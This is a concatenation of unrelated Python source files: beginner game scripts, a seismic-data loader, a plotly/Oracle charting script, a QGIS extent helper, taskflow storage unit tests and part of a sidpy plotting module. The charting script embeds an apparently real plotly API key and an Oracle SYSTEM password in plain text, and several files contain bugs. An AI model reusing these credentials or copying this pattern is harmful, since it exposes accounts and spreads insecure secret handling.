has', player2, 'wins')\r\n gameX = [[' ',' ',' '],\r\n [' ',' ',' '],\r\n [' ',' ',' ']]\r\n game = [[0,0,0],\r\n [0,0,0],\r\n [0,0,0]]\r\n continue\r\n\r\n elif play == 'no':\r\n print('Ending')\r\n break\r\n\r\n while True:\r\n playerO = input('Player 2 enter the coordinate in the form row, column: ')\r\n playerO = playerO.split(',')\r\n\r\n if game[int(playerO[0])-1][int(playerO[1])-1] == 0:\r\n game[int(playerO[0])-1][int(playerO[1])-1] = 2\r\n gameX[int(playerO[0])-1][int(playerO[1])-1] = 'O'\r\n board(gameX)\r\n moves += 1\r\n break\r\n else:\r\n print('That move is already taken')\r\n\r\n if 2 in column(game) or 2 in row(game) or 2 in diagonal(game):\r\n print('Player 2 wins!')\r\n play = input('Do you want to play again?: ')\r\n\r\n if play == 'yes':\r\n moves = 0\r\n player2 += 1\r\n print('Player 1 has', player1, 'wins')\r\n print('Player 2 has', player2, 'wins')\r\n gameX = [[' ',' ',' '],\r\n [' ',' ',' '],\r\n [' ',' ',' ']]\r\n game = [[0,0,0],\r\n [0,0,0],\r\n [0,0,0]]\r\n continue\r\n\r\n elif play == 'no':\r\n print('Ending')\r\n break\r\n\r\n if moves == 9 and win(game) == 2:\r\n print('No one won! Congratulations, you both suck.')\r\n\r\n elif what == 'guess':\r\n a = list(range(1,101))\r\n def end(b):\r\n return b[len(b)-1]\r\n\r\n def beg(b):\r\n return b[0]\r\n\r\n def mid(b):\r\n return b[(len(b)-len(b)//2)-1]\r\n\r\n def guess(b):\r\n global a\r\n print(mid(b))\r\n x = input('Is this your number?: ')\r\n if x == 'high':\r\n a = list(range(beg(b), mid(b) + 1))\r\n elif x == 'low':\r\n a = list(range(mid(b), end(b) + 1))\r\n elif x == 'yes':\r\n print('Yay!')\r\n a = list(range(mid(b), mid(b) -1))\r\n return a\r\n\r\n if __name__ == '__main__':\r\n while len(a) > 2:\r\n guess(a)\r\n if len(a) == 2:\r\n print(mid(a))\r\n z = input('Is this your number?: ')\r\n if z == 'low':\r\n print('Then', a[1],'is your number')\r\n elif z == 'yes':\r\n print('Yay!')\r\n\r\n elif what == 't':\r\n import random\r\n from math import sqrt\r\n n = list(input('Enter a 4-digit number: '))\r\n n = [int(i) for i in n]\r\n z = n\r\n\r\n def group(): # first integer determines grouping side, end or beginning\r\n # second determines how many to group\r\n int = random.randint(1,2)\r\n if int == 1:\r\n int2 = random.randint(2,3)\r\n if int2 == 2:\r\n sqrt = random.randint(1,4)\r\n if sqrt == 1:\r\n proc = process(0, n, sqrt = True)\r\n else:\r\n proc = process(0, n)\r\n elif int2 == 3:\r\n sqrt = random.randint(1,4)\r\n if sqrt == 1:\r\n proc = process(0, n, sqrt = True)\r\n del z[0]\r\n del z[1]\r\n z.insert(0, proc)\r\n\r\n\r\n def divide(beg, n, sqrt = False):\r\n if sqrt == True:\r\n int = random.randint(1,2)\r\n\r\n if int == 1 and sqr(n[beg]) != 'no':\r\n return int(sqr(n[beg]) / n[beg + 1])\r\n\r\n elif int == 2 and sqr(n[beg + 1]) != 'no':\r\n return int(n[beg] / sqr(n[beg + 1]))\r\n\r\n elif (n[beg] / n[beg + 1]) % 1 == 0:\r\n return int(n[beg] / n[beg + 1])\r\n\r\n else:\r\n return 'no'\r\n\r\n def mul(beg, n, sqrt = False):\r\n if sqrt == True:\r\n int = random.randint(1,2)\r\n\r\n if int == 1 and sqr(n[beg]) != 'no':\r\n return int(sqr(n[beg]) * n[beg + 1])\r\n\r\n elif int == 2 and sqr(n[beg + 1]) != 'no':\r\n return int(n[beg] * sqr(n[beg + 1]))\r\n else:\r\n return int(n[beg] * n[beg + 1])\r\n\r\n def add(beg, n, sqrt = False):\r\n if sqrt == True:\r\n int = random.randint(1,2)\r\n\r\n if int == 1 and sqr(n[beg]) != 'no':\r\n return sqr(n[beg]) + n[beg + 1]\r\n\r\n elif int == 2 and sqr(n[beg + 1]) != 'no':\r\n return n[beg] + sqr(n[beg + 1])\r\n else:\r\n return n[beg] + n[beg + 
1]\r\n\r\n        def sub(beg, n, sqrt = False):\r\n            if sqrt == True:\r\n                pick = random.randint(1,2)\r\n\r\n                if pick == 1 and sqr(n[beg]) != 'no':\r\n                    return int(sqr(n[beg]) - n[beg + 1])\r\n\r\n                elif pick == 2 and sqr(n[beg + 1]) != 'no':\r\n                    return int(n[beg] - sqr(n[beg + 1]))  # subtraction, not addition, in this branch\r\n\r\n            elif n[beg] - n[beg + 1] != 0:\r\n                return n[beg] - n[beg + 1]\r\n            else:\r\n                return 'no'\r\n\r\n        def sqr(value):  # takes the digit itself, matching the sqr(n[beg]) call sites\r\n            if sqrt(value) % 1 == 0:\r\n                return int(sqrt(value))\r\n            else:\r\n                return 'no'\r\n\r\n        def process(loc, n, sqrt = False):\r\n            if sqrt == False:\r\n                while True:\r\n                    pick = random.randint(1,4)\r\n                    if pick == 1 and divide(loc, n) != 'no':\r\n                        return divide(loc, n)\r\n                    elif pick == 2:\r\n                        return mul(loc, n)\r\n                    elif pick == 3:\r\n                        return add(loc, n)\r\n                    elif pick == 4 and sub(loc, n) != 'no':\r\n                        return sub(loc, n)\r\n\r\n            elif sqrt == True:\r\n                while True:\r\n                    pick = random.randint(1,4)\r\n                    if pick == 1 and divide(loc, n) != 'no':\r\n                        return divide(loc, n, sqrt = True)\r\n                    elif pick == 2:\r\n                        return mul(loc, n, sqrt = True)\r\n                    elif pick == 3:\r\n                        return add(loc, n, sqrt = True)\r\n                    elif pick == 4 and sub(loc, n) != 'no':\r\n                        return sub(loc, n, sqrt = True)\r\n\r\n    elif what == 'end':\r\n        print('Ending program')\r\n        break\r\n","sub_path":"Python Learning.py","file_name":"Python Learning.py","file_ext":"py","file_size_in_byte":22747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} {"seq_id":"79302675","text":"import segypy\nimport numpy as np\n# Set verbose level\nsegypy.verbose=1;\n\ndef load_segy(filename, min_inline, max_inline, step_inline, min_xline, max_xline, step_xline):\n    # Get only SegyHeader\n    SH = segypy.getSegyHeader(filename);\n\n    inl=np.arange(min_inline, max_inline, step_inline)\n    crl=np.arange(min_xline, max_xline, step_xline)\n\n    seis, header, trace_headers = segypy.readSegy(filename)\n\n    stack = seis.reshape(header['ns'], inl.size, crl.size)\n    return stack","sub_path":"Lukas/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} {"seq_id":"461574252","text":"\n\nimport plotly\nplotly.tools.set_credentials_file(username='Katya_Kollehina', api_key='tVeOqtxhhASLcb9FSv5B')\n\nimport cx_Oracle\nimport plotly.plotly as py\nimport plotly.graph_objs as go\nimport re\nimport plotly.dashboard_objs as dashboard\n\ndef fileId_from_url(url):\n    \"\"\"Return fileId from a url.\"\"\"\n    raw_fileId = re.findall(\"~[A-z]+/[0-9]+\", url)[0][1:]\n    print(raw_fileId)\n    return raw_fileId.replace('/', ':')\n\n\nconnection = cx_Oracle.connect(\"SYSTEM\", \"florist98\", \"localhost:1521/xe\")\n\ncursor = connection.cursor()\n\n\"\"\" create plot 1: Display the song name and its duration. \"\"\"\n\ncursor.execute(\"\"\"\nSELECT\n  song_name,\n  song_duration\nFROM SONG\n  JOIN Human_wrote_song ON song.song_id = Human_wrote_song.song_id\n\"\"\")\n\nsong_name = []\nsong_duration = []\n\nfor row in cursor:\n    print(\"Song_name: \", row[0], \" and its duration: \", row[1])\n    song_name.append(row[0])\n    song_duration.append(row[1])\n\n\ndata = [go.Bar(\n    x=song_name,\n    y=song_duration\n)]\n\nlayout = go.Layout(\n    title='Song_name and its duration',\n    xaxis=dict(\n        title='Song_name',\n        titlefont=dict(\n            family='Courier New, monospace',\n            size=18,\n            color='#7f7f7f'\n        )\n    ),\n    yaxis=dict(\n        title='duration',\n        rangemode='nonnegative',\n        autorange=True,\n        titlefont=dict(\n            family='Courier New, 
monospace',\n            size=18,\n            color='#7f7f7f'\n        )\n    )\n)\nfig = go.Figure(data=data, layout=layout)\n\nsong_name_duration = py.plot(fig, filename='song_name_duration')\n\n\"\"\" create plot 2: Display the singer's name, the song name, and its duration as a percentage relative to the other songs. \"\"\"\n\ncursor.execute(\"\"\"\nSELECT\n  human_name singer,\n  song_name song,\n  song_duration duration\nFROM HUMAN\n  JOIN Human_wrote_song ON human.human_id = Human_wrote_song.human_id\n  JOIN SONG ON song.song_id = Human_wrote_song.song_id\n\"\"\");\n\nsong = []\nduration = []\n\nfor row in cursor:\n    print(\"singer \", row[0] + \", song : (\" + row[1], \") and its duration: \", row[2])\n    song.append(row[0] + \" \" + row[1])\n    duration.append(row[2])\n\npie = go.Pie(labels=song, values=duration)\nsong_duration = py.plot([pie], filename='song duration relative to others')\n\n\"\"\" create plot 3: Display the dynamics of song creation by date \"\"\"\n\ncursor.execute(\"\"\"\nSELECT\n  song_name song,\n  song_birth birthday\nFROM SONG\n  JOIN HUMAN_WROTE_SONG ON song.song_id = Human_wrote_song.song_id\n\"\"\")\nsong = []\nbirthday = []\n\nfor row in cursor:\n    print(\"Song \", row[0], \" Date, when it was written: \", row[1])\n    song.append(row[0])\n    birthday.append(row[1])\n\nsong_birthday = go.Scatter(\n    x=song,\n    y=birthday,\n    mode='lines+markers'\n)\ndata = [song_birthday]\nsong_birthday = py.plot(data, filename='Song by date, when it was written')\n\n\"\"\"--------CREATE DASHBOARD------------------ \"\"\"\n\nsong_name_duration_id = fileId_from_url(song_name_duration) \nsong_duration_id = fileId_from_url(song_duration)\nsong_birthday_id = fileId_from_url(song_birthday)\n\nbox_1 = {\n    'type': 'box',\n    'boxType': 'plot',\n    'fileId': song_name_duration_id,\n    'title': 'Song_name and its duration'\n}\n\nbox_2 = {\n    'type': 'box',\n    'boxType': 'plot',\n    'fileId': song_duration_id,\n    'title': 'song duration relative to others'\n}\n\nbox_3 = {\n    'type': 'box',\n    'boxType': 'plot',\n    'fileId': song_birthday_id,\n    'title': 'Song by date, when it was written'\n}\nmy_dboard = dashboard.Dashboard()\nmy_dboard.insert(box_1)\nmy_dboard.insert(box_2, 'below', 1)\nmy_dboard.insert(box_3, 'left', 2)\n\npy.dashboard_ops.upload(my_dboard, 'My First Dashboard with Python')\n\n","sub_path":"km51/Kollehina_Kateryna/visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":3717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} {"seq_id":"240004963","text":"import math \nlayer = iface.activeLayer()\nextent = layer.extent()\n#region_peninsula = '145399.882634,526940.882019,1979440.790516,2391757.031490'\nxmin, xmax,ymin,ymax = extent.xMinimum(), extent.xMaximum(),extent.yMinimum(),2391840\n#extension_peninsula = '145399.0,526999.0,1979440.0,2391840.0'\ndef more_up(v_o):\n    v_n = round(v_o)\n    if v_n-v_o> 0:\n        return v_n\n    else:\n        return v_n+1\n\nextent_origin={'xmin':xmin,\n    'xmax':xmax,\n    'ymin':ymin,\n    'ymax':ymax}\n\nfor k,v in extent_origin.items():\n    print(k,round(v,3))\n    \n\ntam_pixel = 100\n\nxmin_n = math.trunc(xmin)\nxmax_tp = more_up(xmax)\ndif_x_tp = xmax_tp-xmin_n\nwhile dif_x_tp%tam_pixel != 0:\n    xmax_tp+=1\n    dif_x_tp = xmax_tp-xmin_n\nxmax_n=xmax_tp\n\nymin_n =math.trunc(ymin)\nymax_tp = more_up(ymax)\ndif_y = ymax_tp - ymin_n\n\nwhile dif_y % tam_pixel != 0:\n    ymax_tp+=1\n    dif_y = ymax_tp - ymin_n\nymax_n=ymax_tp\n\nextent_magic={\n    'xmin':xmin_n,\n    'xmax':xmax_n,\n    'ymin':ymin_n,\n    'ymax':ymax_n}\n    \n    \nfor k,v in extent_magic.items():\n    print(k,v)\nregion = \"%f,%f,%f,%f\" % 
(xmin_n, xmax_n, ymin_n, ymax_n)\nprint ('region',region)\nprint (\"width\",(xmax_n- xmin_n)/tam_pixel)\nprint (\"height\",(ymax_n- ymin_n)/tam_pixel)\n\n","sub_path":"codigos/secundarios/extent_magic.py","file_name":"extent_magic.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} {"seq_id":"504890536","text":"# -*- coding: utf-8 -*-\n\n# vim: tabstop=4 shiftwidth=4 softtabstop=4\n\n# Copyright (C) 2013 Yahoo! Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom taskflow import exceptions\nfrom taskflow import states\nfrom taskflow import storage\nfrom taskflow import test\n\n\nclass StorageTest(test.TestCase):\n\n    def test_add_task(self):\n        s = storage.Storage()\n        s.add_task('42', 'my task')\n        self.assertEquals(s.get_task_state('42'), states.PENDING)\n\n    def test_save_and_get(self):\n        s = storage.Storage()\n        s.add_task('42', 'my task')\n        s.save('42', 5)\n        self.assertEquals(s.get('42'), 5)\n        self.assertEquals(s.fetch_all(), {})\n        self.assertEquals(s.get_task_state('42'), states.SUCCESS)\n\n    def test_save_and_get_other_state(self):\n        s = storage.Storage()\n        s.add_task('42', 'my task')\n        s.save('42', 5, states.FAILURE)\n        self.assertEquals(s.get('42'), 5)\n        self.assertEquals(s.get_task_state('42'), states.FAILURE)\n\n    def test_get_non_existing_var(self):\n        s = storage.Storage()\n        s.add_task('42', 'my task')\n        with self.assertRaises(exceptions.NotFound):\n            s.get('42')\n\n    def test_reset(self):\n        s = storage.Storage()\n        s.add_task('42', 'my task')\n        s.save('42', 5)\n        s.reset('42')\n        self.assertEquals(s.get_task_state('42'), states.PENDING)\n        with self.assertRaises(exceptions.NotFound):\n            s.get('42')\n\n    def test_reset_unknown_task(self):\n        s = storage.Storage()\n        s.add_task('42', 'my task')\n        self.assertEquals(s.reset('42'), None)\n\n    def test_fetch_by_name(self):\n        s = storage.Storage()\n        s.add_task('42', 'my task')\n        name = 'my result'\n        s.set_result_mapping('42', {name: None})\n        s.save('42', 5)\n        self.assertEquals(s.fetch(name), 5)\n        self.assertEquals(s.fetch_all(), {name: 5})\n\n    def test_fetch_unknown_name(self):\n        s = storage.Storage()\n        with self.assertRaisesRegexp(exceptions.NotFound,\n                                     \"^Name 'xxx' is not mapped\"):\n            s.fetch('xxx')\n\n    def test_fetch_result_not_ready(self):\n        s = storage.Storage()\n        s.add_task('42', 'my task')\n        name = 'my result'\n        s.set_result_mapping('42', {name: None})\n        with self.assertRaises(exceptions.NotFound):\n            s.get(name)\n        self.assertEquals(s.fetch_all(), {})\n\n    def test_save_multiple_results(self):\n        s = storage.Storage()\n        s.add_task('42', 'my task')\n        s.set_result_mapping('42', {'foo': 0, 'bar': 1, 'whole': None})\n        s.save('42', ('spam', 'eggs'))\n        self.assertEquals(s.fetch_all(), {\n            'foo': 'spam',\n            'bar': 'eggs',\n            'whole': ('spam', 'eggs')\n        })\n\n    def test_mapping_none(self):\n        s = storage.Storage()\n        s.add_task('42', 'my task')\n        s.set_result_mapping('42', None)\n        s.save('42', 5)\n        self.assertEquals(s.fetch_all(), {})\n\n    def 
test_inject(self):\n        s = storage.Storage()\n        s.inject({'foo': 'bar', 'spam': 'eggs'})\n        self.assertEquals(s.fetch('spam'), 'eggs')\n        self.assertEquals(s.fetch_all(), {\n            'foo': 'bar',\n            'spam': 'eggs',\n        })\n\n    def test_fetch_mapped_args(self):\n        s = storage.Storage()\n        s.inject({'foo': 'bar', 'spam': 'eggs'})\n        self.assertEquals(s.fetch_mapped_args({'viking': 'spam'}),\n                          {'viking': 'eggs'})\n\n    def test_fetch_not_found_args(self):\n        s = storage.Storage()\n        s.inject({'foo': 'bar', 'spam': 'eggs'})\n        with self.assertRaises(exceptions.NotFound):\n            s.fetch_mapped_args({'viking': 'helmet'})\n\n    def test_set_and_get_task_state(self):\n        s = storage.Storage()\n        state = states.PENDING\n        s.add_task('42', 'my task')\n        s.set_task_state('42', state)\n        self.assertEquals(s.get_task_state('42'), state)\n\n    def test_get_state_of_unknown_task(self):\n        s = storage.Storage()\n        with self.assertRaisesRegexp(exceptions.NotFound, '^Unknown'):\n            s.get_task_state('42')\n\n    def test_task_by_name(self):\n        s = storage.Storage()\n        s.add_task('42', 'my task')\n        self.assertEquals(s.get_uuid_by_name('my task'), '42')\n\n    def test_unknown_task_by_name(self):\n        s = storage.Storage()\n        with self.assertRaisesRegexp(exceptions.NotFound,\n                                     '^Unknown task name:'):\n            s.get_uuid_by_name('42')\n\n    def test_get_flow_state(self):\n        fd = storage.temporary_flow_detail()\n        fd.state = states.INTERRUPTED\n        fd.save()\n        s = storage.Storage(fd)\n        self.assertEquals(s.get_flow_state(), states.INTERRUPTED)\n\n    def test_set_and_get_flow_state(self):\n        s = storage.Storage()\n        s.set_flow_state(states.SUCCESS)\n        self.assertEquals(s.get_flow_state(), states.SUCCESS)\n","sub_path":"taskflow/tests/unit/test_storage.py","file_name":"test_storage.py","file_ext":"py","file_size_in_byte":5523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} {"seq_id":"96756983","text":"# -*- coding: utf-8 -*-\n\"\"\"\nUtilities for generating static image and line plots of near-publishable quality\n\nCreated on Thu May 05 13:29:12 2016\n\n@author: Suhas Somnath, Chris R. 
Smith\n\"\"\"\n# TODO: All general plotting functions should support data with 1, 2, or 3 spatial dimensions.\n\nfrom __future__ import division, print_function, absolute_import, unicode_literals\n\nimport inspect\nimport os\nimport sys\nfrom numbers import Number\nimport numpy as np\nimport h5py\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nfrom matplotlib.widgets import Slider, Button\nimport matplotlib.patches as patches\nimport matplotlib.animation as animation\nimport matplotlib.ticker as mtick\nfrom matplotlib.colors import LinearSegmentedColormap\nfrom mpl_toolkits.axes_grid1 import ImageGrid\nimport dask.array as da\n\nfrom sidpy.hdf.dtype_utils import is_complex_dtype\nfrom sidpy.base.num_utils import contains_integers, get_exponent\nfrom sidpy.viz.plot_utils import plot_map\n\nif sys.version_info.major == 3:\n    unicode = str\n\ndefault_cmap = plt.cm.viridis\n\n\nclass plot_curve(object):\n    def __init__(self, dset, ref_dims, figure=None, **kwargs):\n\n        fig_args = dict()\n        temp = kwargs.pop('figsize', None)\n        if temp is not None:\n            fig_args['figsize'] = temp\n        if figure is None:\n            self.fig = plt.figure(**fig_args)\n        else:\n            self.fig = figure\n\n        self.dset = dset\n        self.kwargs = kwargs\n\n        # Handle the simple cases first:\n        fig_args = dict()\n        temp = kwargs.pop('figsize', None)\n        if temp is not None:\n            fig_args['figsize'] = temp\n\n        if len(ref_dims) != 1:\n            print('data type not handled yet')\n        self.axis = self.fig.add_subplot(1, 1, 1, **fig_args)\n\n        self._update()\n\n    def _update(self):\n\n        if False:  # is_complex_dtype(np.array(dset)):\n            # Plot real and imaginary parts\n            fig, axes = plt.subplots(nrows=2, **fig_args)\n\n            for axis, ufunc, comp_name in zip(axes.flat, [np.abs, np.angle], ['Magnitude', 'Phase']):\n                axis.plot(self.dset.dims[ref_dims][0], ufunc(np.squeeze(curve)), **kwargs)\n                if comp_name == 'Magnitude':\n                    axis.set_title(self.dset.file.filename.split('/')[-1] + '\\n(' + comp_name + ')', pad=15)\n                    axis.set_xlabel(self.dset.get_dimension_labels()[ref_dims[0]])# + x_suffix)\n                    axis.set_ylabel(self.dset.data_descriptor)\n                    axis.ticklabel_format(style='sci', scilimits=(-2, 3))\n                else:\n                    axis.set_title(comp_name, pad=15)\n                    axis.set_ylabel('Phase (rad)')\n                    axis.set_xlabel(self.get_dimension_labels()[ref_dims[0]])# + x_suffix)\n                    axis.ticklabel_format(style='sci', scilimits=(-2, 3))\n\n            fig.tight_layout()\n            return fig, axes\n\n        else:\n\n            self.axis.clear()\n            self.axis.plot(self.dset.dims[0][0], self.dset, **self.kwargs)\n            self.axis.set_title(self.dset.file.filename.split('/')[-1], pad=15)\n            self.axis.set_xlabel(self.dset.get_dimension_labels()[0])# + x_suffix)\n            self.axis.set_ylabel(self.dset.data_descriptor)\n            self.axis.ticklabel_format(style='sci', scilimits=(-2, 3))\n            self.fig.canvas.draw_idle()\n\nclass plot_image(object):\n    \"\"\"\n    Interactive display of an image plot\n\n    The usual zoom effects of matplotlib apply.\n    Works on every backend because it only depends on matplotlib.\n\n    Important: keep a reference to this class to maintain interactive properties so usage is:\n\n    >>view = plot_image(dataset, {'spatial':[0,1]})\n\n    Input:\n    ------\n    - dset: NSI_dataset\n    - dim_dict: dictionary\n        with key: \"spatial\" list of int: dimension of image\n    \"\"\"\n    def __init__(self, dset, dim_dict, figure=None, **kwargs):\n\n        fig_args = dict()\n        temp = kwargs.pop('figsize', None)\n        if temp is not None:\n            fig_args['figsize'] = temp\n\n        if figure is None:\n            self.fig = plt.figure(**fig_args)\n
else:\n            self.fig = figure\n\n        self.dset = dset\n        extent = self.dset.make_extent(dim_dict['spatial'])\n\n        if is_complex_dtype(self.dset):\n            # Plot real and imaginary parts\n            fig, axes = plt.subplots(nrows=2, **fig_args)\n            for axis, ufunc, comp_name in zip(axes.flat, [np.abs, np.angle], ['Magnitude', 'Phase']):\n                cbar_label = self.data_descriptor\n                if comp_name == 'Phase':\n                    cbar_label = 'Phase (rad)'\n                plot_map(axis, ufunc(np.squeeze(img)), show_xy_ticks=True, show_cbar=True,\n                         cbar_label=cbar_label, x_vec=ref_dims[1].values, y_vec=ref_dims[0].values,\n                         **kwargs)\n                axis.set_title(self.name + '\\n(' + comp_name + ')', pad=15)\n                axis.set_xlabel(ref_dims[1].name + ' (' + ref_dims[1].units + ')' + suffix[1])\n                axis.set_ylabel(ref_dims[0].name + ' (' + ref_dims[0].units + ')' + suffix[0])\n            fig.tight_layout()\n            return fig, axes\n\n        else:\n\n            self.axis = self.fig.add_subplot(1,1,1)\n            self.img = self.axis.imshow(np.squeeze(self.dset).T, extent=extent, **kwargs)\n            self.axis.set_title(self.dset.file.filename.split('/')[-1], pad=15)\n            self.axis.set_xlabel(self.dset.get_dimension_labels()[dim_dict['spatial'][0]])# + x_suffix)\n            self.axis.set_ylabel(self.dset.get_dimension_labels()[dim_dict['spatial'][1]])\n            self.axis.ticklabel_format(style='sci', scilimits=(-2, 3))\n            cbar = self.fig.colorbar(self.img)\n            cbar.set_label(self.dset.data_descriptor)\n            self.fig.tight_layout()\n            self.img.axes.figure.canvas.draw_idle()\n\n\nclass plot_stack(object):\n    \"\"\"\n    Interactive display of image stack plot\n\n    The stack can be scrolled through with a mouse wheel or the slider\n    The usual zoom effects of matplotlib apply.\n    Works on every backend because it only depends on matplotlib.\n\n    Important: keep a reference to this class to maintain interactive properties so usage is:\n\n    >>view = plot_stack(dataset, {'spatial':[0,1], 'stack':[2]})\n\n    Input:\n    ------\n    - dset: NSI_dataset\n    - dim_dict: dictionary\n        with key: \"spatial\" list of int: dimension of image\n        with key: \"time\" or \"stack\": list of int: dimension of image stack\n\n    \"\"\"\n    def __init__(self, dset, dim_dict, figure=None, **kwargs):\n\n        fig_args = dict()\n        temp = kwargs.pop('figsize', None)\n        if temp is not None:\n            fig_args['figsize'] = temp\n\n\n        if figure is None:\n            self.fig = plt.figure(**fig_args)\n        else:\n            self.fig = figure\n\n\n        if len(dset.shape) < 3:\n            raise KeyError('dataset must have at least three dimensions')\n\n        ### We need one stack dimension and two image dimensions as lists in dictionary\n        if 'spatial' not in dim_dict:\n            raise KeyError('dimension_dictionary must contain a spatial key')\n        image_dims = dim_dict['spatial']\n        if len(image_dims) < 2:\n            raise KeyError('spatial key in dimension_dictionary must be list of length 2')\n\n        if 'stack' not in dim_dict:\n            if 'time' in dim_dict:\n                stack_dim = dim_dict['time']\n            else:\n                raise KeyError('dimension_dictionary must contain key stack or time')\n        else:\n            stack_dim = dim_dict['stack']\n        if len(stack_dim) < 1:\n            raise KeyError('stack key in dimension_dictionary must be list of length 1')\n\n        if stack_dim[0] != 0 or image_dims != [1,2]:\n            ## axes not in expected order, displaying a copy of the data with the right dimensional order:\n            self.cube = np.transpose(dset, (stack_dim[0], image_dims[0],image_dims[1]))\n        else:\n            self.cube = dset\n\n        extent = dset.make_extent([image_dims[0],image_dims[1]])\n\n        self.axis = self.fig.add_axes([0.0, 0.2, .9, .7])\n        self.ind = 0\n        self.img = self.axis.imshow(self.cube[self.ind].T, extent=extent, **kwargs)\n        interval = 100 # 
ms, time between animation frames\n\n        self.number_of_slices = self.cube.shape[0]\n\n        self.axis.set_title('image stack: '+dset.file.filename.split('/')[-1]+'\\n use scroll wheel to navigate images')\n        self.img.axes.figure.canvas.mpl_connect('scroll_event', self._onscroll)\n        self.axis.set_xlabel(dset.get_dimension_labels()[image_dims[0]])\n        self.axis.set_ylabel(dset.get_dimension_labels()[image_dims[1]])\n        cbar = self.fig.colorbar(self.img)\n        cbar.set_label(dset.data_descriptor)\n\n\n        axidx = self.fig.add_axes([0.1, 0.05, 0.55, 0.03])\n        self.slider = Slider(axidx, 'image', 0, self.cube.shape[0]-1, valinit=self.ind, valfmt='%d')\n        self.slider.on_changed(self._onSlider)\n        playax = self.fig.add_axes([0.7, 0.05, 0.09, 0.03])\n        self.play_button = Button(playax, 'Play')#, hovercolor='0.975')\n\n        self.play = False\n\n\n        self.play_button.on_clicked(self._play_slice)\n\n        sumax = self.fig.add_axes([0.8, 0.05, 0.09, 0.03])\n        self.sum_button = Button(sumax, 'Average')#, hovercolor='0.975')\n        self.sum_button.on_clicked(self._sum_slice)\n        self.sum = False\n\n        self.anim = animation.FuncAnimation(self.fig, self._updatefig, interval=200, blit=False, repeat = True)\n        self._update()\n\n    def _sum_slice(self,event):\n        self.img.set_data(np.average(self.cube, axis = 0).T)\n        self.img.axes.figure.canvas.draw_idle()\n\n    def _play_slice(self,event):\n        self.play = not self.play\n        if self.play:\n            self.anim.event_source.start()\n        else:\n            self.anim.event_source.stop()\n\n    def _onSlider(self, val):\n        self.ind = int(self.slider.val+0.5)\n        self.slider.valtext.set_text('{}'.format(self.ind))\n        self._update()\n\n    def _onscroll(self, event):\n        #print(\"%s %s\" % (event.button, event.step))\n        if event.button == 'up':\n            self.ind = (self.ind + 1) % self.number_of_slices\n        else:\n            self.ind = (self.ind - 1) % self.number_of_slices\n        self.ind = int(self.ind)\n        self.play = False\n        self.anim.event_source.stop()\n        self.slider.set_val(self.ind)\n\n    def _update(self):\n        self.img.set_data(self.cube[int(self.ind)].T)\n        self.img.axes.figure.canvas.draw_idle()\n        if not self.play:\n            self.anim.event_source.stop()\n\n    def _updatefig(self,*args):\n        self.ind = (self.ind+1) % self.number_of_slices\n        self.slider.set_val(self.ind)\n\n        return self.img\n\nclass plot_spectrum_image(object):\n\n    \"\"\"\n    ### Interactive spectrum imaging plot\n\n    \"\"\"\n\n    def __init__(self, dset, dim_dict, figure=None, horizontal=True, **kwargs):\n\n        fig_args = dict()\n        temp = kwargs.pop('figsize', None)\n        if temp is not None:\n            fig_args['figsize'] = temp\n\n        if figure is None:\n            self.fig = plt.figure(**fig_args)\n        else:\n            self.fig = figure\n\n        if len(dset.shape) < 3:\n            raise KeyError('dataset must have at least three dimensions')\n\n        ### We need one spectral dimension and two image dimensions as lists in dictionary\n        if 'spatial' not in dim_dict:\n            raise KeyError('dimension_dictionary must contain a spatial key')\n        image_dims = dim_dict['spatial']\n        if len(image_dims) < 2:\n            raise KeyError('spatial key in dimension_dictionary must be list of length 2')\n\n        if 'spectral' not in dim_dict:\n            raise KeyError('dimension_dictionary must contain a spectral key')\n        spec_dim = dim_dict['spectral']\n        if len(spec_dim) < 1:\n            raise KeyError('spectral key in dimension_dictionary must be list of length 1')\n\n        if spec_dim[0] != 2 or image_dims != [0,1]:\n            ## axes not in expected order, displaying a copy of the data with the right dimensional order:\n            self.cube = np.transpose(dset, (image_dims[0],image_dims[1], spec_dim[0]))\n        else:\n            self.cube = 
dset\n\n extent = dset.make_extent([image_dims[0],image_dims[1]])\n\n self.horizontal = horizontal\n self.x = 0\n self.y = 0\n self.bin_x = 1\n self.bin_y = 1\n\n sizeX = self.cube.shape[0]\n sizeY = self.cube.shape[1]\n\n self.energy_scale = dset.dims[spec_dim[0]][0]\n\n self.extent = [0,sizeX,sizeY,0]\n self.rectangle = [0,sizeX,0,sizeY]\n self.scaleX = 1.0\n self.scaleY = 1.0\n self.analysis = []\n self.plot_legend = False\n\n\n if horizontal:\n self.axes = self.fig.subplots(ncols=2)\n else:\n self.axes = self.fig.subplots(nrows=2, **fig_args)\n\n self.fig.canvas.set_window_title(dset.file.filename.split('/')[-1])\n self.image = np.sum(self.cube, axis=2)\n\n self.axes[0].imshow(self.image.T, extent = self.extent, **kwargs)\n if horizontal:\n self.axes[0].set_xlabel('distance [pixels]')\n else:\n self.axes[0].set_ylabel('distance [pixels]')\n self.axes[0].set_aspect('equal')\n\n #self.rect = patches.Rectangle((0,0),1,1,linewidth=1,edgecolor='r',facecolor='red', alpha = 0.2)\n self.rect = patches.Rectangle((0,0),self.bin_x,self.bin_y,linewidth=1,edgecolor='r',facecolor='red', alpha = 0.2)\n\n self.axes[0].add_patch(self.rect)\n self.intensity_scale = 1.\n self.spectrum = self.get_spectrum()\n\n self.axes[1].plot(self.energy_scale,self.spectrum)\n self.axes[1].set_title(' spectrum {},{} '.format(self.x, self.y))\n self.xlabel = dset.get_dimension_labels()[spec_dim[0]]\n self.axes[1].set_xlabel(self.xlabel)# + x_suffix)\n self.ylabel = dset.data_descriptor\n 